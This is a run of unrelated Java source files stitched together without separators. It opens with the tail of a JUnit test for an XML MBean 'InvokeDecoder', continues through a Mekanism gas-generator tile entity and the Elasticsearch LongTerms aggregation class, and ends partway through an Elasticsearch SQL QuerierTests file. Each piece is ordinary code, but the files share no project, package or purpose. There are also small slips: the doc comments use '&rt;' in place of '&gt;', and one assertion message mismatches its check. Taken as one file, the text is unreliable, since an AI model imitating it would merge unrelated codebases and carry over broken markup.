<br> * </p> * * <p> * Ideally, the XML would look something like this:<br> * </pre> * &lt;Invoke&rt; * &lt;BeanObjectName&rt;TestMBean&lt;/BeanObjectName&rt; * &lt;Method name="VoidVoidMethod"&rt; * &lt;Param type="int"&rt;5&lt;/Param&rt; * &lt;/Method&rt; * &lt;/Invoke&rt;" * </p> */ @Test public void verifyXMLParamNoValue() throws Exception { StringBuffer XMLData = new StringBuffer(). append("<Invoke>"). append("<BeanObjectName>TestMBean</BeanObjectName>"). append("<Method name=\"VoidVoidMethod\">"). append("<Param type=\"int\"></Param>"). append("</Method>"). append("</Invoke>"); BufferedReader br = new BufferedReader(new StringReader(XMLData.toString())); try { InvokeDecoder id = new InvokeDecoder(br, XMLData.length()); id.DecodeInput(); Assert.assertEquals( "Parameter 0 value should be \"null\"", id.getMethodParams().get(0).getParamValue() , ""); } catch(Exception e) { Assert.fail("An unknown exception was thrown."); } } /** * <p> * Verify the input stream is valid and contains the correct parameters, * parameter types and values. <br> * </p> * * <p> * Ideally, the XML would look something like this:<br> * * <pre> * &lt;Invoke&rt; * &lt;BeanObjectName&rt;Microsoft:name=TestMBean&lt;/BeanObjectName&rt; * &lt;Method name="VoidIntStringMethod"&rt;&lt;/Method&rt; * &lt;Param type="int"&rt;5&lt;/Param&rt; * &lt;Param type="string"&rt;Woohoo&lt;/Param&rt; * &lt;/Invoke&rt;" * </pre> * * </p> */ @Test public void verifyBodyData() throws Exception { StringBuffer XMLData = new StringBuffer(). append("<Invoke>"). append("<BeanObjectName>TestMBean</BeanObjectName>"). append("<Method name=\"VoidVoidMethod\">"). append("<Param type=\"int\">5</Param>"). append("<Param name=\"Param1\" type=\"string\">abcdefg</Param>"). append("</Method>"). 
append("</Invoke>"); BufferedReader br = new BufferedReader(new StringReader(XMLData.toString())); InvokeDecoder id = new InvokeDecoder(br, XMLData.length()); id.DecodeInput(); Assert.assertEquals( "Object name should be \"TestMBean\"", id.getBeanObjectName(), "TestMBean"); Assert.assertEquals( "Method name should be \"VoidVoidMethod\"", id.getMethodName(), "VoidVoidMethod"); Assert.assertEquals( "Parameter 1 type should be \"int\"", id.getMethodParams().get(0).getParamType() , "int"); Assert.assertEquals( "Parameter 1 value should be \"5\"", id.getMethodParams().get(0).getParamValue() , "5"); Assert.assertEquals( "Parameter 1 name should be \"string\"", id.getMethodParams().get(1).getParamName() , "Param1"); Assert.assertEquals( "Parameter 1 type should be \"string\"", id.getMethodParams().get(1).getParamType() , "string"); Assert.assertEquals( "Parameter 1 value should be \"abcdefg\"", id.getMethodParams().get(1).getParamValue() , "abcdefg"); } /** * <p> * Verify the input stream is valid and contains the correct Parameter, * the elements contain extra attributes which should be ignored. <br> * </p> * * <p> * Ideally, the XML would look something like this:<br> * </pre> * &lt;Invoke SomeTag="SomeValue"&rt; * &lt;BeanObjectName&rt;TestMBean&lt;/BeanObjectName&rt; * &lt;Method name="VoidVoidMethod"&rt; * &lt;Param type="int"&rt;5&lt;/Param&rt; * &lt;/Method&rt; * &lt;/Invoke&rt;" * </p> */ @Test public void verifyXML_Extra_Attribures() throws Exception { StringBuffer XMLData = new StringBuffer(). append("<Invoke SomeTag=\"SomeValue\">"). append("<BeanObjectName SomeTag=\"SomeValue\">TestMBean</BeanObjectName>"). append("<Method SomeTag=\"SomeValue\" name=\"VoidVoidMethod\">"). append("<Param SomeTag=\"SomeValue\" type=\"int\">100</Param>"). append("</Method>"). 
append("</Invoke>"); BufferedReader br = new BufferedReader(new StringReader(XMLData.toString())); try { InvokeDecoder id = new InvokeDecoder(br, XMLData.length()); id.DecodeInput(); Assert.assertEquals( "Parameter 0 value should be \"100\"", id.getMethodParams().get(0).getParamValue() , "100"); } catch(Exception e) { Assert.fail("An unknown exception was thrown."); } } }
package mekanism.generators.common.tile;

import java.util.ArrayList;

import mekanism.api.MekanismConfig.general;
import mekanism.api.gas.Gas;
import mekanism.api.gas.GasRegistry;
import mekanism.api.gas.GasStack;
import mekanism.api.gas.GasTank;
import mekanism.api.gas.GasTransmission;
import mekanism.api.gas.IGasHandler;
import mekanism.api.gas.IGasItem;
import mekanism.api.gas.ITubeConnection;
import mekanism.common.FuelHandler;
import mekanism.common.FuelHandler.FuelGas;
import mekanism.common.Mekanism;
import mekanism.common.base.ISustainedData;
import mekanism.common.util.ChargeUtils;
import mekanism.common.util.MekanismUtils;
import net.minecraft.item.ItemStack;
import net.minecraft.nbt.NBTTagCompound;
import net.minecraftforge.common.util.ForgeDirection;
import cpw.mods.fml.common.Optional.Method;
import io.netty.buffer.ByteBuf;
import dan200.computercraft.api.lua.ILuaContext;
import dan200.computercraft.api.lua.LuaException;
import dan200.computercraft.api.peripheral.IComputerAccess;

/**
 * A generator that burns gaseous fuel (looked up through {@link FuelHandler})
 * to produce energy. Slot 0 accepts gas-containing items to drain into the
 * internal tank; slot 1 charges energy items from the stored energy.
 */
public class TileEntityGasGenerator extends TileEntityGenerator implements IGasHandler, ITubeConnection, ISustainedData
{
	/** The maximum amount of gas this block can store. */
	public int MAX_GAS = 18000;

	/** The tank this block is storing fuel in. */
	public GasTank fuelTank;

	/** Ticks of generation remaining from the last unit of fuel drawn. */
	public int burnTicks = 0;

	/** Energy produced per tick while the current fuel unit is burning. */
	public double generationRate = 0;

	public TileEntityGasGenerator()
	{
		super("gas", "GasGenerator", general.FROM_H2*100, general.FROM_H2*2);
		inventory = new ItemStack[2];
		fuelTank = new GasTank(MAX_GAS);
	}

	@Override
	public void onUpdate()
	{
		super.onUpdate();

		if(!worldObj.isRemote)
		{
			// Charge the energy item in slot 1 from stored energy.
			ChargeUtils.charge(1, this);

			// Drain gas from the item in slot 0 into the fuel tank.
			if(inventory[0] != null && fuelTank.getStored() < MAX_GAS)
			{
				Gas gasType = null;

				// Prefer the gas already in the tank; otherwise take the type
				// stored in the item itself.
				if(fuelTank.getGas() != null)
				{
					gasType = fuelTank.getGas().getGas();
				}
				else if(inventory[0] != null && inventory[0].getItem() instanceof IGasItem)
				{
					if(((IGasItem)inventory[0].getItem()).getGas(inventory[0]) != null)
					{
						gasType = ((IGasItem)inventory[0].getItem()).getGas(inventory[0]).getGas();
					}
				}

				// Only accept gases that are registered as burnable fuel.
				if(gasType != null && FuelHandler.getFuel(gasType) != null)
				{
					GasStack removed = GasTransmission.removeGas(inventory[0], gasType, fuelTank.getNeeded());

					boolean isTankEmpty = (fuelTank.getGas() == null);
					int fuelReceived = fuelTank.receive(removed, true);

					// First fuel in an empty tank establishes the output rate.
					if(fuelReceived > 0 && isTankEmpty)
					{
						output = FuelHandler.getFuel(fuelTank.getGas().getGas()).energyPerTick * 2;
					}
				}
			}

			if(canOperate())
			{
				setActive(true);

				if(burnTicks > 0)
				{
					// Continue the current burn cycle.
					burnTicks--;
					setEnergy(electricityStored + generationRate);
				}
				else if(fuelTank.getStored() > 0)
				{
					// Start a new burn cycle by consuming one unit of gas.
					FuelGas fuel = FuelHandler.getFuel(fuelTank.getGas().getGas());

					if(fuel != null)
					{
						burnTicks = fuel.burnTicks - 1;
						generationRate = fuel.energyPerTick;
						fuelTank.draw(1, true);
						setEnergy(getEnergy() + generationRate);
					}
				}
				else {
					// Out of fuel - reset the burn state.
					burnTicks = 0;
					generationRate = 0;
				}
			}
			else {
				setActive(false);
			}
		}
	}

	@Override
	public boolean canExtractItem(int slotID, ItemStack itemstack, int side)
	{
		// Slot 1: fully charged energy items; slot 0: fully drained gas items.
		if(slotID == 1)
		{
			return ChargeUtils.canBeOutputted(itemstack, true);
		}
		else if(slotID == 0)
		{
			return (itemstack.getItem() instanceof IGasItem && ((IGasItem)itemstack.getItem()).getGas(itemstack) == null);
		}

		return false;
	}

	@Override
	public boolean isItemValidForSlot(int slotID, ItemStack itemstack)
	{
		if(slotID == 0)
		{
			// Only gas items containing a registered fuel gas are accepted.
			return itemstack.getItem() instanceof IGasItem &&
					((IGasItem)itemstack.getItem()).getGas(itemstack) != null &&
					FuelHandler.getFuel((((IGasItem)itemstack.getItem()).getGas(itemstack).getGas())) != null;
		}
		else if(slotID == 1)
		{
			return ChargeUtils.canBeCharged(itemstack);
		}

		return true;
	}

	@Override
	public int[] getAccessibleSlotsFromSide(int side)
	{
		// Energy slot from the right side of the block, fuel slot elsewhere.
		return ForgeDirection.getOrientation(side) == MekanismUtils.getRight(facing) ? new int[] {1} : new int[] {0};
	}

	@Override
	public boolean canOperate()
	{
		return getEnergy() < getMaxEnergy() && fuelTank.getStored() > 0 && MekanismUtils.canFunction(this);
	}

	/**
	 * Gets the scaled gas level for the GUI.
	 * @param i - multiplier
	 * @return stored gas scaled into the range [0, i]
	 */
	public int getScaledGasLevel(int i)
	{
		return fuelTank.getStored()*i / MAX_GAS;
	}

	@Override
	@Method(modid = "ComputerCraft")
	public String[] getMethodNames()
	{
		return new String[] {"getStored", "getOutput", "getMaxEnergy", "getEnergyNeeded", "getGas", "getGasNeeded"};
	}

	@Override
	@Method(modid = "ComputerCraft")
	public Object[] callMethod(IComputerAccess computer, ILuaContext context, int method, Object[] arguments) throws LuaException, InterruptedException
	{
		switch(method)
		{
			case 0:
				return new Object[] {getEnergy()};
			case 1:
				return new Object[] {output};
			case 2:
				return new Object[] {getMaxEnergy()};
			case 3:
				return new Object[] {getMaxEnergy()-getEnergy()};
			case 4:
				return new Object[] {fuelTank.getStored()};
			case 5:
				return new Object[] {fuelTank.getNeeded()};
			default:
				Mekanism.logger.error("Attempted to call unknown method with computer ID " + computer.getID());
				return null;
		}
	}

	@Override
	public void handlePacketData(ByteBuf dataStream)
	{
		super.handlePacketData(dataStream);

		// Mirror of getNetworkedData(): flag, optional (gas id, amount), then
		// generationRate and output.
		if(dataStream.readBoolean())
		{
			fuelTank.setGas(new GasStack(GasRegistry.getGas(dataStream.readInt()), dataStream.readInt()));
		}
		else {
			fuelTank.setGas(null);
		}

		generationRate = dataStream.readDouble();
		output = dataStream.readDouble();
	}

	@Override
	public ArrayList getNetworkedData(ArrayList data)
	{
		super.getNetworkedData(data);

		if(fuelTank.getGas() != null)
		{
			data.add(true);
			data.add(fuelTank.getGas().getGas().getID());
			data.add(fuelTank.getStored());
		}
		else {
			data.add(false);
		}

		data.add(generationRate);
		data.add(output);

		return data;
	}

	@Override
	public int receiveGas(ForgeDirection side, GasStack stack, boolean doTransfer)
	{
		boolean isTankEmpty = (fuelTank.getGas() == null);

		if(isTankEmpty || fuelTank.getGas().isGasEqual(stack))
		{
			// BUGFIX: honor doTransfer. The original always passed 'true' to
			// fuelTank.receive(), so a simulated transfer (doTransfer == false)
			// actually filled the tank.
			int fuelReceived = fuelTank.receive(stack, doTransfer);

			// Only update the output rate on a real transfer - on a simulation
			// the tank (and its gas) are unchanged.
			if(doTransfer && isTankEmpty && fuelReceived > 0)
			{
				output = FuelHandler.getFuel(fuelTank.getGas().getGas()).energyPerTick*2;
			}

			return fuelReceived;
		}

		return 0;
	}

	@Override
	public int receiveGas(ForgeDirection side, GasStack stack)
	{
		// Legacy overload: always performs the transfer.
		return receiveGas(side, stack, true);
	}

	@Override
	public void readFromNBT(NBTTagCompound nbtTags)
	{
		super.readFromNBT(nbtTags);

		fuelTank.read(nbtTags.getCompoundTag("fuelTank"));

		// Restore the output rate from any fuel already in the tank.
		boolean isTankEmpty = (fuelTank.getGas() == null);
		FuelGas fuel = (isTankEmpty) ? null : FuelHandler.getFuel(fuelTank.getGas().getGas());
		if(fuel != null)
		{
			output = fuel.energyPerTick * 2;
		}
	}

	@Override
	public void writeToNBT(NBTTagCompound nbtTags)
	{
		super.writeToNBT(nbtTags);

		nbtTags.setTag("fuelTank", fuelTank.write(new NBTTagCompound()));
	}

	@Override
	public boolean canReceiveGas(ForgeDirection side, Gas type)
	{
		// Accept fuel gas on every side except the output face.
		return FuelHandler.getFuel(type) != null && side != ForgeDirection.getOrientation(facing);
	}

	@Override
	public GasStack drawGas(ForgeDirection side, int amount, boolean doTransfer)
	{
		// This generator never exposes its fuel for extraction.
		return null;
	}

	@Override
	public GasStack drawGas(ForgeDirection side, int amount)
	{
		return drawGas(side, amount, true);
	}

	@Override
	public boolean canDrawGas(ForgeDirection side, Gas type)
	{
		return false;
	}

	@Override
	public boolean canTubeConnect(ForgeDirection side)
	{
		return side != ForgeDirection.getOrientation(facing);
	}

	@Override
	public void writeSustainedData(ItemStack itemStack)
	{
		// NOTE(review): assumes itemStack.stackTagCompound was initialized by
		// the caller - confirm against the ISustainedData call sites.
		if(fuelTank != null)
		{
			itemStack.stackTagCompound.setTag("fuelTank", fuelTank.write(new NBTTagCompound()));
		}
	}

	@Override
	public void readSustainedData(ItemStack itemStack)
	{
		if(itemStack.stackTagCompound.hasKey("fuelTank"))
		{
			fuelTank.read(itemStack.stackTagCompound.getCompoundTag("fuelTank"));

			boolean isTankEmpty = (fuelTank.getGas() == null);
			//Update energy output based on any existing fuel in tank
			FuelGas fuel = (isTankEmpty) ? null : FuelHandler.getFuel(fuelTank.getGas().getGas());
			if(fuel != null)
			{
				output = fuel.energyPerTick * 2;
			}
		}
	}
}
/*
 * Licensed to Elasticsearch under one or more contributor
 * license agreements. See the NOTICE file distributed with
 * this work for additional information regarding copyright
 * ownership. Elasticsearch licenses this file to you under
 * the Apache License, Version 2.0 (the "License"); you may
 * not use this file except in compliance with the License.
 * You may obtain a copy of the License at
 *
 *    http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing,
 * software distributed under the License is distributed on an
 * "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
 * KIND, either express or implied. See the License for the
 * specific language governing permissions and limitations
 * under the License.
 */
package org.elasticsearch.search.aggregations.bucket.terms;

import org.elasticsearch.common.Nullable;
import org.elasticsearch.common.io.stream.StreamInput;
import org.elasticsearch.common.io.stream.StreamOutput;
import org.elasticsearch.common.xcontent.XContentBuilder;
import org.elasticsearch.search.aggregations.AggregationStreams;
import org.elasticsearch.search.aggregations.InternalAggregations;
import org.elasticsearch.search.aggregations.bucket.BucketStreamContext;
import org.elasticsearch.search.aggregations.bucket.BucketStreams;
import org.elasticsearch.search.aggregations.reducers.Reducer;
import org.elasticsearch.search.aggregations.support.format.ValueFormatter;
import org.elasticsearch.search.aggregations.support.format.ValueFormatterStreams;

import java.io.IOException;
import java.util.ArrayList;
import java.util.HashMap;
import java.util.List;
import java.util.Map;

/**
 * Result of a {@code terms} aggregation whose bucket keys are {@code long}
 * values. Registered on the wire under the stream name {@code "lterms"}.
 */
public class LongTerms extends InternalTerms<LongTerms, LongTerms.Bucket> {

    public static final Type TYPE = new Type("terms", "lterms");

    // Deserializes a whole LongTerms aggregation from the transport stream.
    public static final AggregationStreams.Stream STREAM = new AggregationStreams.Stream() {
        @Override
        public LongTerms readResult(StreamInput in) throws IOException {
            LongTerms buckets = new LongTerms();
            buckets.readFrom(in);
            return buckets;
        }
    };

    // Deserializes a single bucket; the stream context carries the formatter
    // and the showDocCountError flag that the bucket needs before reading.
    private final static BucketStreams.Stream<Bucket> BUCKET_STREAM = new BucketStreams.Stream<Bucket>() {
        @Override
        public Bucket readResult(StreamInput in, BucketStreamContext context) throws IOException {
            Bucket buckets = new Bucket(context.formatter(), (boolean) context.attributes().get("showDocCountError"));
            buckets.readFrom(in);
            return buckets;
        }

        @Override
        public BucketStreamContext getBucketStreamContext(Bucket bucket) {
            BucketStreamContext context = new BucketStreamContext();
            Map<String, Object> attributes = new HashMap<>();
            attributes.put("showDocCountError", bucket.showDocCountError);
            context.attributes(attributes);
            context.formatter(bucket.formatter);
            return context;
        }
    };

    /** Registers both stream readers under this aggregation's stream name. */
    public static void registerStreams() {
        AggregationStreams.registerStream(STREAM, TYPE.stream());
        BucketStreams.registerStream(BUCKET_STREAM, TYPE.stream());
    }

    /** A single terms bucket keyed by a {@code long} term. */
    static class Bucket extends InternalTerms.Bucket {

        // The long value this bucket groups documents under.
        long term;

        public Bucket(@Nullable ValueFormatter formatter, boolean showDocCountError) {
            super(formatter, showDocCountError);
        }

        public Bucket(long term, long docCount, InternalAggregations aggregations, boolean showDocCountError, long docCountError, @Nullable ValueFormatter formatter) {
            super(docCount, aggregations, showDocCountError, docCountError, formatter);
            this.term = term;
        }

        @Override
        public String getKeyAsString() {
            return String.valueOf(term);
        }

        @Override
        public Object getKey() {
            return term;
        }

        @Override
        public Number getKeyAsNumber() {
            return term;
        }

        @Override
        int compareTerm(Terms.Bucket other) {
            // Compare numerically against the other bucket's key.
            return Long.compare(term, ((Number) other.getKey()).longValue());
        }

        @Override
        Bucket newBucket(long docCount, InternalAggregations aggs, long docCountError) {
            return new Bucket(term, docCount, aggs, showDocCountError, docCountError, formatter);
        }

        @Override
        public void readFrom(StreamInput in) throws IOException {
            // Wire order must mirror writeTo(): term, docCount, optional
            // docCountError, then the sub-aggregations.
            term = in.readLong();
            docCount = in.readVLong();
            docCountError = -1;
            if (showDocCountError) {
                docCountError = in.readLong();
            }
            aggregations = InternalAggregations.readAggregations(in);
        }

        @Override
        public void writeTo(StreamOutput out) throws IOException {
            out.writeLong(term);
            out.writeVLong(getDocCount());
            if (showDocCountError) {
                out.writeLong(docCountError);
            }
            aggregations.writeTo(out);
        }

        @Override
        public XContentBuilder toXContent(XContentBuilder builder, Params params) throws IOException {
            builder.startObject();
            builder.field(CommonFields.KEY, term);
            // Emit a formatted key alongside the raw one when a non-raw
            // formatter is configured.
            if (formatter != null && formatter != ValueFormatter.RAW) {
                builder.field(CommonFields.KEY_AS_STRING, formatter.format(term));
            }
            builder.field(CommonFields.DOC_COUNT, getDocCount());
            if (showDocCountError) {
                builder.field(InternalTerms.DOC_COUNT_ERROR_UPPER_BOUND_FIELD_NAME, getDocCountError());
            }
            aggregations.toXContentInternal(builder, params);
            builder.endObject();
            return builder;
        }
    }

    // Formatter applied when rendering bucket keys as strings; may be null.
    @Nullable ValueFormatter formatter;

    LongTerms() {} // for serialization

    public LongTerms(String name, Terms.Order order, @Nullable ValueFormatter formatter, int requiredSize, int shardSize, long minDocCount,
            List<? extends InternalTerms.Bucket> buckets, boolean showTermDocCountError, long docCountError, long otherDocCount, List<Reducer> reducers,
            Map<String, Object> metaData) {
        super(name, order, requiredSize, shardSize, minDocCount, buckets, showTermDocCountError, docCountError, otherDocCount, reducers, metaData);
        this.formatter = formatter;
    }

    @Override
    public Type type() {
        return TYPE;
    }

    @Override
    public LongTerms create(List<Bucket> buckets) {
        // Copy of this aggregation with the given buckets substituted in.
        return new LongTerms(this.name, this.order, this.formatter, this.requiredSize, this.shardSize, this.minDocCount, buckets,
                this.showTermDocCountError, this.docCountError, this.otherDocCount, this.reducers(), this.metaData);
    }

    @Override
    public Bucket createBucket(InternalAggregations aggregations, Bucket prototype) {
        // Copy of the prototype bucket with the given sub-aggregations.
        return new Bucket(prototype.term, prototype.docCount, aggregations, prototype.showDocCountError, prototype.docCountError, prototype.formatter);
    }

    @Override
    protected LongTerms create(String name, List<org.elasticsearch.search.aggregations.bucket.terms.InternalTerms.Bucket> buckets, long docCountError, long otherDocCount, InternalTerms prototype) {
        return new LongTerms(name, prototype.order, ((LongTerms) prototype).formatter, prototype.requiredSize, prototype.shardSize,
                prototype.minDocCount, buckets, prototype.showTermDocCountError, docCountError, otherDocCount, prototype.reducers(), prototype.getMetaData());
    }

    @Override
    protected void doReadFrom(StreamInput in) throws IOException {
        // Wire order must mirror doWriteTo() exactly.
        this.docCountError = in.readLong();
        this.order = InternalOrder.Streams.readOrder(in);
        this.formatter = ValueFormatterStreams.readOptional(in);
        this.requiredSize = readSize(in);
        this.shardSize = readSize(in);
        this.showTermDocCountError = in.readBoolean();
        this.minDocCount = in.readVLong();
        this.otherDocCount = in.readVLong();
        int size = in.readVInt();
        List<InternalTerms.Bucket> buckets = new ArrayList<>(size);
        for (int i = 0; i < size; i++) {
            Bucket bucket = new Bucket(formatter, showTermDocCountError);
            bucket.readFrom(in);
            buckets.add(bucket);
        }
        this.buckets = buckets;
        // Lazily rebuilt lookup map is invalidated by the new bucket list.
        this.bucketMap = null;
    }

    @Override
    protected void doWriteTo(StreamOutput out) throws IOException {
        out.writeLong(docCountError);
        InternalOrder.Streams.writeOrder(order, out);
        ValueFormatterStreams.writeOptional(formatter, out);
        writeSize(requiredSize, out);
        writeSize(shardSize, out);
        out.writeBoolean(showTermDocCountError);
        out.writeVLong(minDocCount);
        out.writeVLong(otherDocCount);
        out.writeVInt(buckets.size());
        for (InternalTerms.Bucket bucket : buckets) {
            bucket.writeTo(out);
        }
    }

    @Override
    public XContentBuilder doXContentBody(XContentBuilder builder, Params params) throws IOException {
        builder.field(InternalTerms.DOC_COUNT_ERROR_UPPER_BOUND_FIELD_NAME, docCountError);
        builder.field(SUM_OF_OTHER_DOC_COUNTS, otherDocCount);
        builder.startArray(CommonFields.BUCKETS);
        for (InternalTerms.Bucket bucket : buckets) {
            bucket.toXContent(builder, params);
        }
        builder.endArray();
        return builder;
    }
}
/*
 * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one
 * or more contributor license agreements. Licensed under the Elastic License
 * 2.0; you may not use this file except in compliance with the Elastic License
 * 2.0.
 */
package org.elasticsearch.xpack.sql.execution.search;

import org.elasticsearch.action.ActionListener;
import org.elasticsearch.common.io.stream.NamedWriteable;
import org.elasticsearch.core.Tuple;
import org.elasticsearch.search.aggregations.MultiBucketConsumerService;
import org.elasticsearch.test.ESTestCase;
import org.elasticsearch.xpack.ql.type.Schema;
import org.elasticsearch.xpack.sql.SqlTestUtils;
import org.elasticsearch.xpack.sql.execution.search.Querier.AggSortingQueue;
import org.elasticsearch.xpack.sql.session.Cursor;
import org.elasticsearch.xpack.sql.session.SchemaRowSet;
import org.elasticsearch.xpack.sql.session.SqlSession;

import java.util.ArrayList;
import java.util.Arrays;
import java.util.BitSet;
import java.util.Collections;
import java.util.Comparator;
import java.util.List;
import java.util.concurrent.atomic.AtomicInteger;

import static java.util.Collections.emptyList;
import static org.elasticsearch.xpack.sql.execution.search.ScrollCursorTests.randomHitExtractor;

/**
 * Tests for {@link Querier}'s client-side sorting: the bounded
 * {@link AggSortingQueue} priority queue and the local aggregation sorter
 * listener. Queue entries are {@code Tuple<row-values, insertion-ordinal>};
 * sort keys are {@code Tuple<column-index, Comparator>} (a null comparator
 * means the column is already presorted and insertion order is used).
 */
public class QuerierTests extends ESTestCase {

    @SuppressWarnings("rawtypes")
    public void testAggSortingAscending() {
        // Single natural-order key on column 0.
        Tuple<Integer, Comparator> tuple = new Tuple<>(0, Comparator.naturalOrder());
        Querier.AggSortingQueue queue = new AggSortingQueue(10, Collections.singletonList(tuple));
        // Insert 51 rows in descending order; only the 10 smallest survive.
        for (int i = 50; i >= 0; i--) {
            queue.insertWithOverflow(new Tuple<>(Collections.singletonList(i), i));
        }
        List<List<?>> results = queue.asList();

        assertEquals(10, results.size());
        for (int i = 0; i < 10; i++) {
            assertEquals(i, results.get(i).get(0));
        }
    }

    @SuppressWarnings("rawtypes")
    public void testAggSortingDescending() {
        // Single reverse-order key on column 0.
        Tuple<Integer, Comparator> tuple = new Tuple<>(0, Comparator.reverseOrder());
        Querier.AggSortingQueue queue = new AggSortingQueue(10, Collections.singletonList(tuple));
        // Insert ascending; only the 10 largest survive, returned descending.
        for (int i = 0; i <= 50; i++) {
            queue.insertWithOverflow(new Tuple<>(Collections.singletonList(i), i));
        }
        List<List<?>> results = queue.asList();

        assertEquals(10, results.size());
        for (int i = 0; i < 10; i++) {
            assertEquals(50 - i, results.get(i).get(0));
        }
    }

    @SuppressWarnings("rawtypes")
    public void testAggSorting_TwoFields() {
        // Column 0 descending, column 1 ascending as tie-breaker.
        List<Tuple<Integer, Comparator>> tuples = new ArrayList<>(2);
        tuples.add(new Tuple<>(0, Comparator.reverseOrder()));
        tuples.add(new Tuple<>(1, Comparator.naturalOrder()));

        Querier.AggSortingQueue queue = new AggSortingQueue(10, tuples);
        // Column 0 cycles through 2..51, so each value appears twice (i and i+50).
        for (int i = 1; i <= 100; i++) {
            queue.insertWithOverflow(new Tuple<>(Arrays.asList(i % 50 + 1, i), i));
        }
        List<List<?>> results = queue.asList();

        assertEquals(10, results.size());
        for (int i = 0; i < 10; i++) {
            assertEquals(50 - (i / 2), results.get(i).get(0));
            assertEquals(49 - (i / 2) + ((i % 2) * 50), results.get(i).get(1));
        }
    }

    @SuppressWarnings("rawtypes")
    public void testAggSorting_TwoFields_One_Presorted() {
        // Column 0 is presorted (null comparator), column 1 sorts descending;
        // the first five rows carry a null in the presorted column.
        List<Tuple<Integer, Comparator>> tuples = new ArrayList<>(2);
        tuples.add(new Tuple<>(0, null));
        tuples.add(new Tuple<>(1, Comparator.reverseOrder()));

        Querier.AggSortingQueue queue = new AggSortingQueue(20, tuples);
        for (int i = 1; i <= 100; i++) {
            queue.insertWithOverflow(new Tuple<>(Arrays.asList(i <= 5 ? null : 100 - i + 1, i), i));
        }
        List<List<?>> results = queue.asList();

        assertEquals(20, results.size());
        for (int i = 0; i < 20; i++) {
            assertEquals(i < 5 ? null : 100 - i, results.get(i).get(0));
            assertEquals(i < 5 ? 5 - i : i + 1, results.get(i).get(1));
        }
    }

    @SuppressWarnings({ "rawtypes", "unchecked" })
    public void testAggSorting_FourFields() {
        // Mix of sorted and presorted (null-comparator) columns; the expected
        // ordering is computed independently with the full comparator chain.
        List<Comparator> comparators = Arrays.<Comparator>asList(
            Comparator.naturalOrder(),
            Comparator.naturalOrder(),
            Comparator.reverseOrder(),
            Comparator.naturalOrder()
        );
        List<Tuple<Integer, Comparator>> tuples = new ArrayList<>(4);
        tuples.add(new Tuple<>(0, null));
        tuples.add(new Tuple<>(1, comparators.get(1)));
        tuples.add(new Tuple<>(2, null));
        tuples.add(new Tuple<>(3, comparators.get(3)));

        Querier.AggSortingQueue queue = new AggSortingQueue(35, tuples);
        List<List<Integer>> expected = new ArrayList<>(128);
        for (int i = 0; i < 128; i++) {
            int col1 = i / 16;
            int col2 = 15 - (i / 8);
            int col3 = 32 - (i / 4);
            int col4 = 127 - i;
            expected.add(Arrays.asList(col1, col2, col3, col4));
            queue.insertWithOverflow(new Tuple<>(Arrays.asList(col1, col2, col3, col4), i));
        }
        // Reference sort applies all four comparators in column order.
        expected.sort((o1, o2) -> {
            for (int i = 0; i < 4; i++) {
                int result = comparators.get(i).compare(o1.get(i), o2.get(i));
                if (result != 0) {
                    return result;
                }
            }
            return 0;
        });

        List<List<?>> results = queue.asList();
        assertEquals(35, results.size());
        for (int i = 0; i < 35; i++) {
            for (int j = 0; j < 4; j++) {
                assertEquals(expected.get(i).get(j), results.get(i).get(j));
            }
        }
    }

    @SuppressWarnings("rawtypes")
    public void testAggSorting_Randomized() {
        // Initialize comparators for fields (columns)
        int noColumns = randomIntBetween(3, 10);
        List<Tuple<Integer, Comparator>> tuples = new ArrayList<>(noColumns);
        boolean[] ordering = new boolean[noColumns];
        for (int j = 0; j < noColumns; j++) {
            boolean order = randomBoolean();
            ordering[j] = order;
            Comparator comp = order ? Comparator.naturalOrder() : Comparator.reverseOrder();
            tuples.add(new Tuple<>(j, comp));
        }

        // Insert random no of documents (rows) with random 0/1 values for each field
        int noDocs = randomIntBetween(10, 50);
        int queueSize = randomIntBetween(4, noDocs / 2);
        List<List<Integer>> expected = new ArrayList<>(noDocs);
        Querier.AggSortingQueue queue = new AggSortingQueue(queueSize, tuples);
        for (int i = 0; i < noDocs; i++) {
            List<Integer> values = new ArrayList<>(noColumns);
            for (int j = 0; j < noColumns; j++) {
                values.add(randomBoolean() ? 1 : 0);
            }
            queue.insertWithOverflow(new Tuple<>(values, i));
            expected.add(values);
        }

        List<List<?>> results = queue.asList();
        assertEquals(queueSize, results.size());
        // Reference sort mirrors the per-column asc/desc choices made above.
        expected.sort((o1, o2) -> {
            for (int j = 0; j < noColumns; j++) {
                if (o1.get(j) < o2.get(j)) {
                    return ordering[j] ? -1 : 1;
                } else if (o1.get(j) > o2.get(j)) {
                    return ordering[j] ? 1 : -1;
                }
            }
            return 0;
        });
        assertEquals(expected.subList(0, queueSize), results);
    }

    public void testFullQueueSortingOnLocalSort() {
        // Exactly at the bucket limit: the sorter succeeds with one response.
        Tuple<Integer, Integer> actions = runLocalAggSorterWithNoLimit(MultiBucketConsumerService.DEFAULT_MAX_BUCKETS);
        assertEquals("Exactly one response expected", 1, actions.v1().intValue());
        assertEquals("No failures expected", 0, actions.v2().intValue());
    }

    public void testQueueOverflowSortingOnLocalSort() {
        // Past the bucket limit: the sorter reports a failure instead.
        Tuple<Integer, Integer> actions = runLocalAggSorterWithNoLimit(MultiBucketConsumerService.DEFAULT_MAX_BUCKETS + 2);
        assertEquals("No response expected", 0, actions.v1().intValue());
        assertEquals("Exactly one failure expected", 1, actions.v2().intValue());
    }

    /**
     * Feeds a synthetic row set of {@code dataSize} rows through a
     * {@code LocalAggregationSorterListener} with no explicit limit (-1) and
     * returns {@code (responseCount, failureCount)} observed by the listener.
     */
    Tuple<Integer, Integer> runLocalAggSorterWithNoLimit(int dataSize) {
        // Minimal row set: one synthetic column whose value is the row index.
        class TestResultRowSet<E extends NamedWriteable> extends ResultRowSet<E> implements SchemaRowSet {
            private int rowCounter = 0;
            private final int dataSize;

            TestResultRowSet(List<E> extractors, BitSet mask, int dataSize) {
                super(extractors, mask);
                this.dataSize = dataSize;
            }

            @Override
            protected Object extractValue(NamedWriteable namedWriteable) {
                return rowCounter++;
            }

            @Override
            protected boolean doHasCurrent() {
                return true;
            }

            @Override
            protected boolean doNext() {
                return rowCounter < dataSize;
            }

            @Override
            protected void doReset() {}

            @Override
            public Schema schema() {
                return new Schema(emptyList(), emptyList());
            }

            @Override
            public int size() {
                return dataSize; // irrelevant
            }
        }
        ;
        Cursor.Page page = new Cursor.Page(
